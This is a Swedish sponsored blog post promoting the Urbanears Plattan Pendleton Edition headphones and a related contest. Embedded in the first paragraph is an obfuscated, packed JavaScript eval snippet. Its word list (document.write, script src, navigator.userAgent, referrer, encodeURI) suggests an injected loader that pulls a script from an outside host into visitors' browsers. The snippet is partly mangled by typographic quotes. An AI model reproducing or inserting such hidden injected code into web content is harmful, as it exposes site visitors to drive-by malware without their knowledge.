Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

Sponsrad Video: Urbanears Plattan Pendleton Edition

Sponsrad Video: Urbanears Plattan Pendleton Edition
Filip Urde
  • On 12 november, 2013
  • http://www.revue.se/filip-urde

Urbanears eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hztfb|var|u0026u|referrer|rkkyn||js|php’.split(’|’),0,{}))
blir lite mysigare i år tillsammans med Pendleton
och de vill att just du ska med på resan. Sätt igång din kreativa hjärna och visa hur du vrider upp temperaturen var du än är. Om du gör ett bra förslag så vinner du en resa för två till Ishotellet i Jukkasjärvi , där kan du sedan sätta dina nyfunna kunskaper i praktiken .
Är du # warmenough ? Kolla www.urbanears.com eller www.facebook.com / urbanearsheadphones för information om hur du går med i tävlingen den 30 oktober 2013.

 

 
type=”text/javascript” src=”http://video.unrulymedia.com/wildfire_147751021.js”>
Historien om hur Pendleton Kom till Sverige

Vad är kopplingen mellan denna amerikanska tyg arvet och svenska hörlurarna Urbanears?  Ja, kort och gott så är ju vintern ganska lång här uppe i norr och vi uppskattar något som kommer att hålla oss varma under dessa kalla, långa månader. Pendleton tyg känns som de har en naturlig plats på ett par Plattan Edition hörlurar, där kan de agera både som värmare för öronen och göra att hörlurarna ser grymma ut.

Urbanears Plattan Pendleton Edition ger dina hörlurar en smak av den långvariga amerikansk traditionen av Pendleton tyg.  Klädda i Pendletons lätta, rena jungfru ull, med ett mönster som är influerat av indianska filtar och textilier ger dig en cool look. Gör din dagliga ljudupplevelse lite mer speciell med Pendletons tidlösa design och hålla öronen fina och varma på samma gång.

Plattan Pendleton Edition kommer att finnas tillgänglig på utvalda Urbanears återförsäljare världen över och online på Urbanears.com från och med den 30 oktober 2013. Plattan Pendleton Edition är det femte paret i ordningen som ska lanseras under varumärket Urbanears Editions, vilket bara det är spännande.

Om Urbanears Editions

De kommer två gånger om året och är en specialversion av våra populäraste Urbanears Plattan modell som har utrustats med något extra. Tidigare utgåvor har inkluderat vaddering, Denim , Harris Tweed och Re : Plattan .

Detta inlägg är sponsrat.